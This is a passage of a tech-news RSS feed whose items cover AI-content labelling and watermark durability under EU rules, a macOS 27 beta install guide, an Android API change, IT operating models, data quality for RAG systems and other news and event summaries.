<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Releases macOS 27 Golden Gate Beta 4: What’s New and How to Install]]></title>
<description><![CDATA[Apple has released macOS 27 Golden Gate beta 4 to registered developers for testing. The latest build arrives as Apple continues refining the major macOS update before its public release later this year.



The update is available over the air on compatible Macs enrolled in the developer beta pro...]]></description>
<link>https://tsecurity.de/de/3682190/ios-mac-os/apple-releases-macos-27-golden-gate-beta-4-whats-new-and-how-to-install/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682190/ios-mac-os/apple-releases-macos-27-golden-gate-beta-4-whats-new-and-how-to-install/</guid>
<pubDate>Mon, 20 Jul 2026 23:11:00 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released macOS 27 Golden Gate beta 4 to registered developers for testing. The latest build arrives as Apple continues refining the major macOS update before its public release later this year.



The update is available over the air on compatible Macs enrolled in the developer beta program. Since beta software can contain bugs, users should back up important files before starting the installation.



How To Install



Developers can download the update through the Software Update section:




Back up your Mac using Time Machine or another backup method.



Open the System Settings app.



Select General and click Software Update.



Click the information icon next to Beta Updates.



Select macOS 27 Developer Beta.



Return to the Software Update screen.



Click Upgrade Now to download and install beta 4.




A free Apple developer account linked to the Mac is required to access the developer beta.



What’s New in macOS 27 Golden Gate Beta 4



Apple has not announced any major user-facing features specifically added in beta 4. The update appears to focus on fixing bugs, improving performance and making existing macOS 27 features more stable.



Some areas users should check after installing the update include:




Siri AI stability: macOS 27 introduces a more conversational Siri experience with expanded Apple Intelligence features. Beta 4 should continue improving its performance and reliability.



Liquid Glass design: Apple is refining transparency, typography, navigation bars and other visual elements across apps and system menus.



System performance: The latest beta likely contains under-the-hood improvements for app launches, animations and general system responsiveness.



App compatibility: Developers can use beta 4 to test their apps against the latest macOS 27 APIs and identify problems before the final release.



Bug fixes: The update should address problems reported in earlier builds, although Apple has not provided a complete public list of fixes.




More changes may appear as developers continue testing the update. Apple plans to release macOS 27 Golden Gate to compatible Mac users later this year.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Attackers Combo Up Evasion Tactics for BEC Phishing]]></title>
<description><![CDATA["The TFF Trap" uses fileless techniques and loaders with low detection rates to deploy various RATs and stealers, including Agent Tesla, Remcos, XWorm, and Best Private Logger.]]></description>
<link>https://tsecurity.de/de/3681973/it-security-nachrichten/attackers-combo-up-evasion-tactics-for-bec-phishing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681973/it-security-nachrichten/attackers-combo-up-evasion-tactics-for-bec-phishing/</guid>
<pubDate>Mon, 20 Jul 2026 20:52:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["The TFF Trap" uses fileless techniques and loaders with low detection rates to deploy various RATs and stealers, including Agent Tesla, Remcos, XWorm, and Best Private Logger.]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS Golden Gate Beta 4 – Everything You Need to Know!]]></title>
<description><![CDATA[macOS Golden Gate Beta 27.0 Beta 4 (26A5388g) is now Available! UPDATED: 07/20/26 Apple has released the fourth developer beta of macOS Golden Gate! Let’s jump in and find out what’s new in this update! Beta 4 further improves the Liquid Glass design with better readability, updated window stylin...]]></description>
<link>https://tsecurity.de/de/3681943/ios-mac-os/macos-golden-gate-beta-4-everything-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681943/ios-mac-os/macos-golden-gate-beta-4-everything-you-need-to-know/</guid>
<pubDate>Mon, 20 Jul 2026 20:22:57 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>macOS Golden Gate Beta 27.0 Beta 4 (26A5388g) is now Available! UPDATED: 07/20/26 Apple has released the fourth developer beta of macOS Golden Gate! Let’s jump in and find out what’s new in this update! Beta 4 further improves the Liquid Glass design with better readability, updated window styling, and a new transparency slider that … <a href="https://mrmacintosh.com/macos-golden-gate-beta-4-everything-you-need-to-know/" class="more-link">Continue reading<span class="screen-reader-text"> "macOS Golden Gate Beta 4 – Everything You Need to Know!"</span></a></p>
<p>The post <a href="https://mrmacintosh.com/macos-golden-gate-beta-4-everything-you-need-to-know/">macOS Golden Gate Beta 4 – Everything You Need to Know!</a> appeared first on <a href="https://mrmacintosh.com/">Mr. Macintosh</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Upcoming Changes to the Nearby Connections API]]></title>
<description><![CDATA[Posted by Wei Wang, Engineering Manager, Android BeTo



User privacy and transparency are core to the Android experience. To better align with these principles, we are updating the default behavior of the Nearby Connections API regarding how it interacts with device radios.

What is changing?
Pr...]]></description>
<link>https://tsecurity.de/de/3681790/android-tipps/upcoming-changes-to-the-nearby-connections-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681790/android-tipps/upcoming-changes-to-the-nearby-connections-api/</guid>
<pubDate>Mon, 20 Jul 2026 19:06:26 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<i>Posted by Wei Wang, Engineering Manager, Android BeTo</i>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG84rk4vo20t7pFUGFUp6Cx38qbJTZWW5Q5ztSfPOaV474gZ4mnT7qpnC6o4hKJkwR6CiD4TwPWCS0aU-w0nr70WkKrcpR2yRM5PXnMDa9t3mjgQVahNBzLijD2v23LiDj_NaMWoyVXWTV3cKXHsForureZTA1_Q5M_03ZAve7PybnhpYpGG05IS2uCv0/s8583/Upcoming%20Changes%20to%20the%20Nearby%20Connections%20API%20_Blog.png"><img border="0" data-original-height="2600" data-original-width="8583" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG84rk4vo20t7pFUGFUp6Cx38qbJTZWW5Q5ztSfPOaV474gZ4mnT7qpnC6o4hKJkwR6CiD4TwPWCS0aU-w0nr70WkKrcpR2yRM5PXnMDa9t3mjgQVahNBzLijD2v23LiDj_NaMWoyVXWTV3cKXHsForureZTA1_Q5M_03ZAve7PybnhpYpGG05IS2uCv0/s1600/Upcoming%20Changes%20to%20the%20Nearby%20Connections%20API%20_Blog.png"></a></div>

<p>User privacy and transparency are core to the Android experience. To better align with these principles, we are updating the default behavior of the Nearby Connections API regarding how it interacts with device radios.</p>

<h2>What is changing?</h2>
<p>Previously, the Nearby Connections API could automatically toggle Wi-Fi and Bluetooth radios ON to facilitate connections without explicit user intervention. Moving forward, the API will no longer automatically enable these radios for 1P and 3P applications.</p>

<h2>What this means for developers</h2>
<p>If your app relies on Nearby Connections, you will need to update your implementation to account for these changes:</p>
<ul>
  <li><strong>Manual Radio Management:</strong> You must ensure that the necessary radios (Wi-Fi or Bluetooth) are enabled before initiating Nearby Connections tasks.</li>
  <li><strong>User Notification:</strong> If the required radios are disabled, your app must now inform the user and request that they enable them manually. The API will no longer programmatically turn them on for you.</li>
</ul>

<h2>Timing</h2>
<p>These changes are scheduled to take effect in late 2026. We recommend reviewing your connection workflows now to ensure a seamless transition for your users.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[House of the Dragon Season 3 Episode 5 Secret Tunnel Explained]]></title>
<description><![CDATA[House of the Dragon Season 3 Episode 5 places Alicent and Helaena inside one of the Red Keep’s hidden passages, where a planned escape quickly turns into a dangerous trap. Their disappearance adds fresh political tension while also showing how the castle’s secret tunnels can protect people, misle...]]></description>
<link>https://tsecurity.de/de/3681779/ios-mac-os/house-of-the-dragon-season-3-episode-5-secret-tunnel-explained/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681779/ios-mac-os/house-of-the-dragon-season-3-episode-5-secret-tunnel-explained/</guid>
<pubDate>Mon, 20 Jul 2026 19:04:53 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[House of the Dragon Season 3 Episode 5 places Alicent and Helaena inside one of the Red Keep’s hidden passages, where a planned escape quickly turns into a dangerous trap. Their disappearance adds fresh political tension while also showing how the castle’s secret tunnels can protect people, mislead them, or leave them buried beneath the seat of power.



The passage appears to connect with the maze built under the Red Keep during the reign of Maegor I Targaryen. Maegor ordered the construction of hidden doors, false walls, and escape routes so he could survive attacks or flee during a siege. He later killed the workers who knew the full design, which left the tunnels dangerous for anyone who entered without guidance.



Why Alicent and Helaena Become Trapped



Alicent and Helaena close the hidden door after entering the passage, then discover that someone has blocked the route ahead. Helaena drops their only light after a rat frightens her, leaving both women trapped in complete darkness with no clear way back.



The blocked path suggests that someone deliberately closed this escape route. Mysaria stands out as the main suspect because she appears to know what happens across the Red Keep, including private details about Helaena. Larys Strong also remains a possible suspect because he often plans and understands how people behave under pressure.



Their Disappearance Creates Political Trouble



Rhaenyra will probably assume that Alicent and Helaena escaped from the castle, while Mysaria can use that belief to increase suspicion inside the Black faction. Daemon may reach a different conclusion and suspect that Ormund Hightower arranged their removal as part of a wider Green plan.



Alicent and Helaena will likely escape the tunnels, but their temporary disappearance can still push both sides toward further conflict. The scene also gives the Red Keep a stronger role in the story, as its hidden structure becomes another source of fear, confusion, and political danger.]]></content:encoded>
</item>
<item>
<title><![CDATA[Finding the right balance between autonomy and scale]]></title>
<description><![CDATA[For diversified enterprises, few operating model questions are as persistent or polarizing as centralization versus decentralization. Decentralization promises speed, ownership, and local responsiveness. Centralization promises efficiency, standardization, and leverage. Both can be right. Both ca...]]></description>
<link>https://tsecurity.de/de/3680711/it-security-nachrichten/finding-the-right-balance-between-autonomy-and-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680711/it-security-nachrichten/finding-the-right-balance-between-autonomy-and-scale/</guid>
<pubDate>Mon, 20 Jul 2026 11:36:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For diversified enterprises, few operating model questions are as persistent or polarizing as centralization versus decentralization. Decentralization promises speed, ownership, and local responsiveness. <a href="https://www.cio.com/article/4166851/coherence-where-leadership-and-ai-success-intersect.html?utm=hybrid_search">Centralization</a> promises efficiency, standardization, and leverage. Both can be right. Both can be wrong. The challenge is that many organizations end up with both models operating at once, without enough clarity about why.</p>



<p class="wp-block-paragraph">The result of fragmented systems, duplicated capabilities, inconsistent data, rising IT spend, and a complexity tax that compounds over time is familiar to many CIOs. What starts as autonomy can become architectural sprawl. What starts as enterprise leverage can become bureaucracy. And as companies modernize core platforms, integrate data, and scale capabilities like AI, the tension becomes harder to ignore.</p>



<p class="wp-block-paragraph">Paul Krebs has lived that tension from multiple vantage points. Most recently as CIO and chief transformation officer at Koch Industries, and previously a technology and transformation leader at The Coca-Cola Company, he’s worked in environments where business units value autonomy, enterprise scale matters, and the wrong <a href="https://www.cio.com/article/4074675/the-clear-advantage-of-an-80-20-ai-operating-model.html">operating model</a> can slow progress just as easily as the wrong technology architecture.</p>



<p class="wp-block-paragraph">His conclusion isn’t that CIOs should pick a side, but they need a more intentional form of centralization, one that starts with business architecture, clarifies decision rights, and continually revisits where capabilities should sit as the organization matures.</p>



<h2 class="wp-block-heading"><a></a>Centralization: a design choice, not a doctrine</h2>



<p class="wp-block-paragraph">In diversified organizations, <a href="https://www.cio.com/article/649879/how-huber-spurs-innovation-in-a-historically-decentralized-business.html?utm=hybrid_search">decentralization</a> often starts as the default because it aligns with how the business creates value. Local businesses understand their customers, markets, regulatory environments, and operating realities, and giving them decision rights can increase speed and accountability.</p>



<p class="wp-block-paragraph">In Krebs’ experience, the default model often leaned toward decentralization, he says, with the belief that optimizing for customers and markets would allow different businesses to be as responsive as possible to the specific customers and markets they served. But that logic isn’t complete. Leaders also need to ask whether there’s a compelling case where a more centralized approach can generate additional value, accelerate progress, or optimize investments.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4021841/lighting-the-first-flame-how-to-spark-a-transformation-that-sticks.html">Digital transformation</a> created one of those moments. Krebs recalls around 2016 when Koch challenged its businesses to build multi-year digital transformation roadmaps. The ambition was there, but the capabilities to execute at the necessary pace weren’t evenly distributed. In response, the organization invested more aggressively from the center, building shared services and centers of expertise in areas such as business transformation, enterprise applications, and data and analytics.</p>



<p class="wp-block-paragraph">The purpose was acceleration, not control. Centralizing those capabilities helped accelerate learnings, capability building, and their ability to deploy new solutions at scale. But the move wasn’t treated as permanent. “There was always a belief that the centralization push should be re-looked at on a regular basis, not thought of as a forever decision,” he says.</p>



<h2 class="wp-block-heading"><a></a>Know what belongs at the center</h2>



<p class="wp-block-paragraph">Over time, Krebs learned that  the capabilities most likely to remain centralized were those where scale, consistency, and risk management mattered more than local differentiation. Infrastructure, <a href="https://www.cio.com/article/4065346/how-cross-functional-teams-rewrite-the-rules-of-it-collaboration.html?utm=hybrid_search">collaboration platforms</a>, cybersecurity, cloud management, FinOps, and the help desk were natural candidates to remain shared services.</p>



<p class="wp-block-paragraph">Other areas were more nuanced. Some application capabilities moved back into the businesses as local maturity increased. Many data and insights capabilities also moved closer to the business once teams had built enough muscle to own them. Meanwhile, certain emerging capabilities such as spatial technologies like AR/VR remained centralized because it didn’t yet make sense for each business to build them independently. Many companies have lived this journey as well, for example, with gen AI, which often started with a <a href="https://www.cio.com/article/4027422/the-missing-backbone-behind-your-stalled-ai-strategy.html">center of excellence</a>, and then evolved into a more decentralized approach, enabling teams across the business to innovate quickly.</p>



<p class="wp-block-paragraph">That distinction avoids the trap of treating the enterprise as one uniform operating model. “Both models can be successful, and both have advantages,” he says. “That’s what makes the balance so difficult.”</p>



<p class="wp-block-paragraph">Centralization provides a clearer path to execution at scale and cleaner decision rights, but it requires <a href="https://www.cio.com/article/4082282/preparing-your-workforce-for-ai-agents-a-change-management-guide.html?utm=hybrid_search">change management</a> and careful attention to bureaucracy. Decentralization provides ownership and speed, but it can also over index toward preference versus real differentiation, he adds, while making architecture harder to scale later.</p>



<h2 class="wp-block-heading"><a></a>Don’t confuse standardization with centralization</h2>



<p class="wp-block-paragraph">One of the most important distinctions Krebs makes is between centralization and standardization. Many organizations treat them as interchangeable, but they’re not.</p>



<p class="wp-block-paragraph">“You can have a centralized team that can manage the nuances of different requirements,” Krebs says. “You can also have a centralized standard platform that can be used in a decentralized manner.”</p>



<p class="wp-block-paragraph">That distinction opens up more operating model choices. A company may centralize a platform but decentralize how business teams configure or use it. It may standardize process patterns while keeping execution close to the region or business unit. It may also centralize architectural governance while allowing local teams to move quickly within defined guardrails.</p>



<p class="wp-block-paragraph">This is especially important in global organizations, where regional needs are real but not always unique. Krebs advises leaders to examine whether local requirements can be made more generic and reusable. The risk is solving each local requirement as a one-off, so the better path is to understand the underlying requirement, build it in a way that can scale, and still allow local teams to execute within the standard model.</p>



<h2 class="wp-block-heading"><a></a>Let business architecture lead technology architecture</h2>



<p class="wp-block-paragraph">Few topics expose the centralization tension more clearly than ERP consolidation. Many diversified companies, particularly those shaped by acquisition, end up with dozens or hundreds of ERP instances. Some leaders push for massive consolidation. Others prefer to build integration layers on top of the existing environment.</p>



<p class="wp-block-paragraph">Krebs’s starting point is neither technology nor cost. It’s business architecture. “The easiest and most effective path is when the IT or systems architecture follows and aligns to the business architecture,” he says.</p>



<p class="wp-block-paragraph">If the business is truly going to operate processes separately, separate systems may be appropriate. But if the organization has numerous teams, processes, and tools, leaders need to ask whether there’s enough differentiation and value to justify that complexity.</p>



<p class="wp-block-paragraph">The same logic applies to <a href="https://www.cio.com/article/3973877/treat-your-transformation-like-a-merger.html">M&amp;A</a>. Companies can get into trouble when integration synergies are held hostage by ERP migration timelines. Instead, Krebs advises starting with the business integration strategy. Understand where the synergies are, how the business architecture should come together, and then decide whether the IT architecture needs to be fully integrated, or whether a data layer, reporting platform, or other integration approach can deliver value faster.</p>



<h2 class="wp-block-heading"><a></a>Make the cost of complexity visible</h2>



<p class="wp-block-paragraph">CIOs in decentralized companies often face a frustrating dynamic. The business wants autonomy and speed, but the same leadership team still questions why IT spend is high relative to benchmarks. Krebs says the answer starts with cost alignment and visibility.</p>



<p class="wp-block-paragraph">In environments with a mix of centralized and decentralized services, Krebs saw centralized capabilities like infrastructure, help desk, and security perform well on benchmarks. More decentralized areas, such as BI, reporting, and commercial applications, often had more redundancy and higher cost.</p>



<p class="wp-block-paragraph">The point isn’t to blame the business but make the <a href="https://www.cio.com/article/3985680/products-not-permission-slips-a-new-way-to-pay-for-digital-value.html">economics</a> of complexity visible. CIOs need to show how flexibility in one area may require multiple systems, data stores, or teams elsewhere. “I understand we want flexibility here,” Krebs says. “But leaders must see when that flexibility may cost the company money, and be clear on whether the value justifies it.”</p>



<p class="wp-block-paragraph">That shifts the conversation from IT cost to business service economics. A single aggregate IT spend number is rarely useful in a decentralized environment. More helpful is a capability-based view that shows which areas are scaled efficiently, which are fragmented, and where the business architecture is driving the technology cost structure.</p>



<h2 class="wp-block-heading"><a></a>Revisit the model as maturity changes</h2>



<p class="wp-block-paragraph">For a new CIO entering a decentralized environment, Krebs cautions against immediately declaring that too many things need to be centralized. The better starting point is curiosity. “I would begin with just trying to understand why they’ve made the decisions they have,” he says.</p>



<p class="wp-block-paragraph">From there, CIOs can engage leaders in a conversation about the <a href="https://www.cio.com/article/3966240/from-banquet-to-bistro-how-the-product-model-is-transforming-the-business-of-technology.html">target operating model</a>, connecting business architecture to technology, data, and organizational capabilities. Once the direction is clear, he advises CIOs to work with the willing. Find the parts of the organization that already see the need for change, prove the model there, and scale from demonstrated success.</p>



<p class="wp-block-paragraph">Regardless of execution, though, the right model changes over time. A low-maturity capability may benefit from centralization because the organization needs to build talent, avoid reinventing the wheel, and accelerate learning. As maturity grows, decentralization may make more sense because business teams need flexibility to adapt quickly. Once maturity is high and patterns stabilize, the organization may be ready to centralize again to <a href="https://www.cio.com/article/4158552/scaling-ai-at-union-pacific-starts-with-people.html?utm=hybrid_search">leverage scale</a>.</p>



<p class="wp-block-paragraph">“Once I’ve decided I’m going to start with centralized or decentralized, you don’t necessarily need to stay in that model,” Krebs says. “You need to be continually revisiting the operating model as your organization matures and evolves.”</p>



<p class="wp-block-paragraph">That may be the heart of smart centralization. It rejects the false permanence of operating model decisions, and recognizes that autonomy and scale are both valuable, but in different places, at different times, for different reasons.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The cleanup trap: Stop asking RAG to fix bad data]]></title>
<description><![CDATA[The enterprise technology ecosystem is caught in a costly cycle. Over the past two years, millions of dollars have been funneled into generative AI pilots, yet many of these initiatives stall out before ever reaching a live production environment.When a project fails, the immediate instinct of te...]]></description>
<link>https://tsecurity.de/de/3679963/it-nachrichten/the-cleanup-trap-stop-asking-rag-to-fix-bad-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679963/it-nachrichten/the-cleanup-trap-stop-asking-rag-to-fix-bad-data/</guid>
<pubDate>Sun, 19 Jul 2026 22:32:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The enterprise technology ecosystem is caught in a costly cycle. Over the past two years, millions of dollars have been funneled into generative AI pilots, yet many of these initiatives stall out before ever reaching a live production environment.</p><p>When a project fails, the immediate instinct of technical leadership is often to blame the model: The context window was too restrictive, the latency was too high, or the reasoning capabilities simply were not there.</p><p>But as data engineers building the scaffolding for these systems, we often see a different reality: The model receives the blame, but the pipeline usually contains the root cause. Production gen AI rarely fails because of model limitations alone. More often, it fails because the enterprise data foundation underneath it is fundamentally unready.</p><p>This is what I call the 'Cleanup Trap': The false belief that an organization can pipe fragmented, inconsistent, and ungoverned legacy data into a large language model (LLM) orchestrator and simply “clean it up” or patch it at the retrieval layer.</p><h2><b>The mirage of the retrieval layer</b></h2><p>In a standard retrieval-augmented generation (RAG) architecture, the retrieval layer is tasked with pulling relevant business context to ground the model’s responses. Because modern frameworks make it simple to stand up a vector database and a basic embedding pipeline, leadership often assumes that the data engineering problem is solved.</p><p>It is not.</p><p>When an embedding model receives raw, unvalidated data directly from operational silos, the resulting vector space inherits the structural noise, duplicate records, and conflicting states present in the source systems.</p><p>If the core data pipeline suffers from silent degradation — schema drift, missing fields, delayed change-data-capture (CDC) synchronization — that degradation cascades directly into the vector store. An AI model cannot accurately synthesize customer intelligence if the data pipeline behind it is serving stale, contradictory profiles across disparate storage layers.</p><p>No amount of prompt engineering, semantic reranking, or vector hyperparameter tuning can compensate for a broken ingestion pipeline. If the foundation is compromised, the downstream application will hallucinate, expose unauthorized context, or fail to deliver deterministic value.</p><h2><b>Shifting from ad-hoc patching to programmatic guardrails</b></h2><p>To break out of the 'Cleanup Trap,' enterprise data teams must stop treating data quality as a post-processing step. They need to treat data readiness for AI with the same rigor they bring to traditional transaction processing.</p><p>This requires a deliberate architectural shift toward zero-trust data ingestion, structured validation frameworks, and automated anomaly detection before data ever reaches an AI orchestration layer.</p><h3><b>1. Harden the ingestion pipeline</b></h3><p>Data quality checks cannot exist as a nightly batch afterthought. If an enterprise AI application relies on real-time data to assist users, validation must happen inline.</p><p>Teams should implement explicit schema validation checks at the earliest ingestion point, such as the streaming ingress layer or the bronze landing layer of a medallion architecture. If an upstream operational database mutates a schema without warning, the pipeline should quarantine anomalous payloads rather than allowing corrupted metadata to pollute downstream AI contexts.</p><h3><b>2. Use multi-tiered algorithmic validation</b></h3><p>Static row-count validation rules are insufficient for AI readiness. True data health requires a multi-tiered approach.</p><p>This means pairing structural verification — null checks, type conformance, and schema validation — with statistical profiling to monitor for data drift. Tracking metric deviations across feature distributions helps ensure that historical context remains stable over time.</p><p>If a pipeline suddenly processes an unexpected spike in empty string variables or structurally deviant fields, automated alerts should trigger an immediate pause before vector database updates continue.</p><h3><b>3. Decouple security and compliancemfrom the model</b></h3><p>An LLM should never be the arbiter of data access control. Trying to enforce row-level security or personal data filtering through system prompts is a compliance risk.</p><p>Security must be managed within the data infrastructure tier. Enterprise data foundations should enforce strict access controls, tokenization of sensitive identifiers, and rigorous lineage tracing before information is indexed into vector stores or passed into an agent’s context window.</p><h2><b>Technical alignment: A pragmatic blueprint</b></h2><p>For technology leaders mapping their infrastructure roadmaps, AI readiness requires evaluating data pipelines against a strict operational checklist.</p><ul><li><p>Can you trace a flawed AI response back to the exact pipeline execution, source record, and transformation step that produced it?</p></li><li><p>Does your data lake architecture have a programmatic mechanism to segment and quarantine corrupted or non-compliant data before it reaches production feature stores?</p></li><li><p>Are your operational systems and AI-facing vector databases tightly synchronized, or are your agents making automated decisions based on outdated snapshots?</p></li></ul><p>These questions matter because production AI is not just a model deployment problem. It is a data reliability problem.</p><h2><b>Building for the production era</b></h2><p>The honeymoon phase of gen AI experimentation is ending. Enterprise leaders are demanding measurable, predictable, and secure business outcomes from their AI investments.</p><p>If an organization wants to transition from isolated, impressive-looking demos to resilient, production-grade AI systems, it must redirect its focus. Stop looking exclusively at the model tier.</p><p>The real competitive differentiator is not only the LLM an organization chooses. It is the engineering discipline, data governance, and pipeline resilience of the infrastructure built to feed it.</p><p>In the production era of AI, data engineering is no longer a backend function. It is the control plane for enterprise intelligence.</p><p><i>Naveen Ayalla is a senior data engineer. </i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Killing the astrophysical chameleon (emf2026)]]></title>
<description><![CDATA[Astronomical observations show that our universe is expanding faster and faster in all directions due to something we call ‘dark energy’ – but what exactly is it? There are many theories out there, and astrophysicists have an unlikely ally in the search – atomic physicists like myself. As part of...]]></description>
<link>https://tsecurity.de/de/3679483/it-security-video/killing-the-astrophysical-chameleon-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679483/it-security-video/killing-the-astrophysical-chameleon-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 14:48:30 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Astronomical observations show that our universe is expanding faster and faster in all directions due to something we call ‘dark energy’ – but what exactly is it? There are many theories out there, and astrophysicists have an unlikely ally in the search – atomic physicists like myself. As part of my PhD research, I used lasers to trap and cool atoms to use as tiny sensors to search for new physics, including searching for evidence of a specific dark energy candidate, the chameleon field. In this talk I will give an overview of the physics behind dark energy and my experiment, explain how atomic physics experiments have applications across all sorts of fields, and why even though I ended up measuring zero, that’s still moving science forward. 

Note: no actual chameleons were harmed in the making of this talk.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/246-killing-the-astrophysical-chameleon]]></content:encoded>
</item>
<item>
<title><![CDATA[Government use of automated AI decision-making to be curbed under new Australian rules]]></title>
<description><![CDATA[New national plan accompanied by Labor push for digital duty of care legislationGet our breaking news email, free app or daily news podcastThe use of AI in automated decision-making by government departments and agencies will be subject to tough rules under a new national plan, expected to extend...]]></description>
<link>https://tsecurity.de/de/3679427/ai-nachrichten/government-use-of-automated-ai-decision-making-to-be-curbed-under-new-australian-rules/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679427/ai-nachrichten/government-use-of-automated-ai-decision-making-to-be-curbed-under-new-australian-rules/</guid>
<pubDate>Sun, 19 Jul 2026 14:03:38 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New national plan accompanied by Labor push for digital duty of care legislation</p><ul><li><p>Get our <a href="https://www.theguardian.com/email-newsletters?CMP=cvau_sfl">breaking news email</a>, <a href="https://app.adjust.com/w4u7jx3">free app</a> or <a href="https://www.theguardian.com/australia-news/series/full-story?CMP=cvau_sfl">daily news podcast</a></p></li></ul><p>The use of AI in automated decision-making by government departments and agencies will be subject to tough rules under a new national plan, expected to extend to consumer protections, workplace safety and privacy.</p><p>As the Albanese government grapples with the rapid growth in the use of artificial intelligence and a boom in datacentre construction, senior ministers have begun work to draw up new rules to ensure safety is built into AI processes inside government, prioritising fairness, accuracy and transparency.</p> <a href="https://www.theguardian.com/australia-news/2026/jul/19/national-ai-plan-labor-anthony-albanese-andrew-charlton">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Killing the astrophysical chameleon (emf2026)]]></title>
<description><![CDATA[Astronomical observations show that our universe is expanding faster and faster in all directions due to something we call ‘dark energy’ – but what exactly is it? There are many theories out there, and astrophysicists have an unlikely ally in the search – atomic physicists like myself. As part of...]]></description>
<link>https://tsecurity.de/de/3679391/it-security-video/killing-the-astrophysical-chameleon-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679391/it-security-video/killing-the-astrophysical-chameleon-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 13:17:56 +0200</pubDate>
